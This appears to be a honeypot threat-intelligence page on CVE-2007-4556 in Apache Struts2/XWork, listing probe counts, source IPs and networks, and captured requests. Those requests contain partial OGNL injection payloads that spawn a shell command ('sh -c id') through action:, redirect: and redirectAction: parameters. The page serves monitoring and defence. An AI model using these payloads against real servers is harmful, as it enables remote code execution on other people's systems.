CVE-2007-4556: OpenSymphony XWork/Apache Struts2 - Remote Code Execution

HoneyLabs honeypots recorded 26 probes matching CVE-2007-4556 from 6 distinct source IP addresses in the last 7 days. Severity is rated medium.

Request paths that identify it

  • /login.action

Addresses probing it

Source IPProbesNetworkCountry
93.123.109.21421Techoff Srv LimitedBulgaria
157.230.19.1401DigitalOcean, LLCGermany
209.97.180.81DigitalOcean, LLCUnited Kingdom
147.182.149.751DigitalOcean, LLCCanada
165.227.173.411DigitalOcean, LLCGermany
146.190.103.1031DigitalOcean, LLCSingapore

Networks it comes from

ASNOrganisationProbesSource IPs
AS48090Techoff Srv Limited211
AS14061DigitalOcean, LLC55

Captured requests

  • /login.action
  • /login.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20…
  • /login.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%…
  • /login.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%…

CVE report

CVE report

Open a specific CVE from the CVE tracker.